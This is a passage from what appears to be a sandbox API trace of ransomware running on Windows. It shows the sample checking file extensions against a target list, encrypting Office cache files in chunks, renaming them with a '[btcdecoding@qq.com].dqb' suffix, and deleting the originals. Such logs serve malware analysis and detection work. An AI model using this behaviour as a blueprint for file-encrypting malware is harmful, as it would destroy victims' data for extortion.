lpString2=".cab") returned 1 [0045.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.290] lstrlenW (lpString=".1cd") returned 4 [0045.290] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.290] lstrlenW (lpString=".jpg") returned 4 [0045.290] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.290] lstrlenW (lpString=".doc") returned 4 [0045.290] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.290] lstrlenW (lpString=".docx") returned 5 [0045.290] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.290] lstrlenW (lpString=".pdf") returned 4 [0045.290] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.290] lstrlenW (lpString=".xls") returned 4 [0045.290] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.290] lstrlenW (lpString=".xlsx") returned 5 [0045.290] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.290] lstrlenW (lpString=".ppt") returned 4 [0045.290] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.290] lstrlenW (lpString=".zip") returned 4 [0045.290] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.290] lstrlenW (lpString=".rar") returned 4 [0045.290] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.290] lstrlenW (lpString=".bz2") returned 4 [0045.290] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.290] lstrlenW (lpString=".7z") returned 3 [0045.290] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.290] lstrlenW (lpString=".dbf") returned 4 [0045.290] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.291] lstrlenW (lpString=".1cd") returned 4 [0045.291] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.291] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.291] lstrlenW (lpString=".jpg") returned 4 [0045.291] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.291] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0045.291] lstrlenW (lpString="PidGenX.dll") returned 11 [0045.291] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.291] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=1463568) returned 1 [0045.291] CloseHandle (hObject=0x20c) returned 1 [0045.291] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0045.291] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.291] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.291] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.291] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.291] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0045.292] GetLastError () returned 0x0 [0045.292] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0045.413] WriteFile (in: hFile=0x160, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0045.519] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x65520, lpOverlapped=0x0) returned 1 [0045.579] WriteFile (in: hFile=0x160, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0045.588] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.588] WriteFile (in: hFile=0x160, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.588] SetEndOfFile (hFile=0x160) returned 1 [0045.588] CloseHandle (hObject=0x160) returned 1 [0045.588] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.588] SetEndOfFile (hFile=0x20c) returned 1 [0045.592] CloseHandle (hObject=0x20c) returned 1 [0045.592] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.592] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0045.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.593] lstrlenW (lpString=".doc") returned 4 [0045.593] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0045.593] lstrlenW (lpString=".docx") returned 5 [0045.593] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0045.593] lstrlenW (lpString=".pdf") returned 4 [0045.593] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0045.593] lstrlenW (lpString=".xls") returned 4 [0045.593] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0045.593] lstrlenW (lpString=".xlsx") returned 5 [0045.593] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0045.593] lstrlenW (lpString=".ppt") returned 4 [0045.593] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0045.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.593] lstrlenW (lpString=".zip") returned 4 [0045.593] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0045.593] lstrlenW (lpString=".rar") returned 4 [0045.593] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0045.593] lstrlenW (lpString=".bz2") returned 4 [0045.593] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0045.593] lstrlenW (lpString=".7z") returned 3 [0045.593] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0045.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.593] lstrlenW (lpString=".dbf") returned 4 [0045.593] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0045.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.593] lstrlenW (lpString=".1cd") returned 4 [0045.593] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0045.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.593] lstrlenW (lpString=".jpg") returned 4 [0045.593] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.593] lstrlenW (lpString=".doc") returned 4 [0045.593] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0045.594] lstrlenW (lpString=".docx") returned 5 [0045.594] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0045.594] lstrlenW (lpString=".pdf") returned 4 [0045.594] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0045.594] lstrlenW (lpString=".xls") returned 4 [0045.594] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0045.594] lstrlenW (lpString=".xlsx") returned 5 [0045.594] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0045.594] lstrlenW (lpString=".ppt") returned 4 [0045.594] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0045.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.594] lstrlenW (lpString=".zip") returned 4 [0045.594] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0045.594] lstrlenW (lpString=".rar") returned 4 [0045.594] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0045.594] lstrlenW (lpString=".bz2") returned 4 [0045.594] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0045.594] lstrlenW (lpString=".7z") returned 3 [0045.594] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0045.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.594] lstrlenW (lpString=".dbf") returned 4 [0045.594] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0045.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.594] lstrlenW (lpString=".1cd") returned 4 [0045.594] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0045.594] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0045.594] lstrlenW (lpString=".jpg") returned 4 [0045.594] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.594] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0045.594] lstrlenW (lpString="ProPrWW.cab") returned 11 [0045.595] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.669] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=177720283) returned 1 [0045.669] CloseHandle (hObject=0x214) returned 1 [0045.669] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab")) returned 0x2020 [0045.669] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.669] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0045.670] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.670] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.670] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.670] ReadFile (in: hFile=0x214, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.888] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.888] ReadFile (in: hFile=0x214, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.893] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.893] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.894] ReadFile (in: hFile=0x214, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.908] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.908] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0045.925] SetEndOfFile (hFile=0x214) returned 1 [0045.926] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f24080 [0045.926] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.926] WriteFile (in: hFile=0x214, lpBuffer=0x3f24080*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f24080*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.926] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.926] WriteFile (in: hFile=0x214, lpBuffer=0x3f24080*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f24080*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.927] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.927] WriteFile (in: hFile=0x214, lpBuffer=0x3f24080*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f24080*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.929] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f24080 | out: hHeap=0x570000) returned 1 [0045.929] CloseHandle (hObject=0x214) returned 1 [0045.929] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.929] lstrlenW (lpString=".doc") returned 4 [0045.929] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.929] lstrlenW (lpString=".docx") returned 5 [0045.929] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0045.929] lstrlenW (lpString=".pdf") returned 4 [0045.929] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.929] lstrlenW (lpString=".xls") returned 4 [0045.929] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.929] lstrlenW (lpString=".xlsx") returned 5 [0045.929] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0045.930] lstrlenW (lpString=".ppt") returned 4 [0045.930] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.930] lstrlenW (lpString=".zip") returned 4 [0045.930] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString=".rar") returned 4 [0045.930] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString=".bz2") returned 4 [0045.930] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.930] lstrlenW (lpString=".7z") returned 3 [0045.930] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.930] lstrlenW (lpString=".dbf") returned 4 [0045.930] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.930] lstrlenW (lpString=".1cd") returned 4 [0045.930] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.930] lstrlenW (lpString=".jpg") returned 4 [0045.930] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.930] lstrlenW (lpString=".doc") returned 4 [0045.930] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString=".docx") returned 5 [0045.930] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0045.930] lstrlenW (lpString=".pdf") returned 4 [0045.930] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString=".xls") returned 4 [0045.930] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString=".xlsx") returned 5 [0045.930] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0045.930] lstrlenW (lpString=".ppt") returned 4 [0045.930] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.930] lstrlenW (lpString=".zip") returned 4 [0045.930] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.930] lstrlenW (lpString=".rar") returned 4 [0045.931] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.931] lstrlenW (lpString=".bz2") returned 4 [0045.931] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.931] lstrlenW (lpString=".7z") returned 3 [0045.931] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.931] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.931] lstrlenW (lpString=".dbf") returned 4 [0045.931] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.931] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.931] lstrlenW (lpString=".1cd") returned 4 [0045.931] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.931] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.931] lstrlenW (lpString=".jpg") returned 4 [0045.931] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.931] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0045.931] lstrlenW (lpString="Office32WW.msi") returned 14 [0045.931] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0046.187] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=1992192) returned 1 [0046.190] CloseHandle (hObject=0x180) returned 1 [0046.215] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0046.215] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.215] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0046.215] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0046.215] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0046.215] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.215] ReadFile (in: hFile=0x180, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.219] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.220] ReadFile (in: hFile=0x180, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.228] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) 